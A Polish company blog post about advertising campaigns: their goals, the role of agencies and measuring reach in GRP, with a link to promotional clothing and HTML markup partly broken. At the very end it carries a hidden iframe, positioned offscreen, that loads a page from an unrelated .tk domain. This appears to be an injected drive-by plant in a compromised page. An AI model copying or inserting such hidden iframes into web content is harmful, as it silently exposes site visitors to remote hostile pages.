Reklama (nie tylko odzieżowa)

Reklama firmy w internecie i poza nim – na czym polega kampania reklamowa?

22 grudnia 2015 • Opublikowane przez

Z reklamą do czynienia mamy na każdym kroku. Widzimy ją w telewizji, na stronach gazet, słyszymy w radiu. Portale społecznościowe przepełnione są reklamami ze wszystkich stron. Za wszystkimi działaniami związanymi z promowaniem produktów odpowiedzialny jest szereg specjalistów. Na czym polega więc kampania reklamowa?

!–more–

nbsp;

strongPo co ta kampania?/strong

Przyjrzyjmy się najpierw strongcelom kampanii reklamowej/strong. Po co właściwie właściciele znanych (a i nieznanych, w tym przecież sęk) decydują się na kampanię reklamową? Przede wszystkim strongdla zwiększenia zysków ze sprzedaży/strong produktów. Nie opłaca się produkować towar, który nie zostanie sprzedany. A żeby ktoś zechciał go kupić, musi najpierw o nim usłyszeć. To po pierwsze. Kampania ma sprawić, że potencjalni klienci dowiedzą się o istnieniu danego produktu. Co dalej? Liczy się nie tylko sprzedaż konkretnej rzeczy, ale również — głównie w przypadku nowych firm — zbudowanie marki. Firmy, które dopiero wchodzą na rynek, chcą, by dowiedziało się o nich jak najliczniejsze grono przyszłych kupujących. Nie tylko dowiedziało się, ale i pozytywnie zapamiętało. Tak, aby kolejne pojawiające się produkty danej maki były z nią kojarzone i dobrze się sprzedawały. W momencie wejścia na rynek nowości będą kojarzone z poprzednikami i dzięki temu sprzedaż wzrośnie. W ten sposób machina reklamowa sama się nakręca.

nbsp;

strongProjekt kampanii reklamowej – wszystko w rękach agencji/strong

Właściciele firm, którzy chcą strongwprowadzić markę na rynek/strong, najczęściej nie podejmują się tego sami. Proszą o pomoc agencje reklamowe. W nich bowiem pracują specjaliści do spraw promocji i marketingu, którzy wiedzą, co trafi do odbiorcy. Przygotowują hasła reklamowe i projekty zachęcających plakatów. Zadbają o właściwąstrong reklamę firmy w internecie/strong. Mogą również zaprojektować logo np. na strongspan style=”text-decoration: underline;”a href=”http://argos.pl”odzież reklamową/a/span/strong. Mają wiedzę i pomysły, które w połączeniu sprawią, że produkt się sprzeda. I ich projekty, wdrażane w życie, sprawdzają się i przynoszą oczekiwane skutki.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/12/burza-mózgów.jpeg”img class=”size-full wp-image-2617″ src=”http://argos.pl/blog/wp-content/uploads/2015/12/burza-mózgów.jpeg” alt=”Źródło: experto24.pl” width=”717″ height=”450″ //a Źródło: experto24.pl

nbsp;

strongJak cię widzą, tak cię piszą/strong

Dlatego właśnie po przeprowadzonej kampanii zbiera się statystyki. Intensywność kampanii mierzona jest w GRP (strongGross Rating Point/strong). To jednostka określająca wartość procentową oglądalności poszczególnych emisji danej reklamy oraz wszystkich emisji łącznie. Na tej podstawie określić można, jaką siłę miała kampania. Przeprowadzane są również badania wśród konsumentów. Jeżeli w ich opinii reklama przedstawiła markę jako solidną i klienci są skłonni sięgnąć po jej produkty lub usługi, działania agencji reklamowej można uznać za skuteczne.

nbsp;

Kampania reklamowa to najlepszy sposób na wypromowanie własnej marki. Aby w pełni wykorzystać potencjał firmy, przydatna może okazać się strongpomoc specjalistów/strong, którzy ów potencjał wydobędą. Właścicieli firm można jednak zapewnić o jednym — dobra reklama może zdziałać cuda, warto więc odważyć się na przeprowadzenie kampanii. Korzyści gwarantowane!

nbsp;

nbsp;

nbsp;

nbs!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe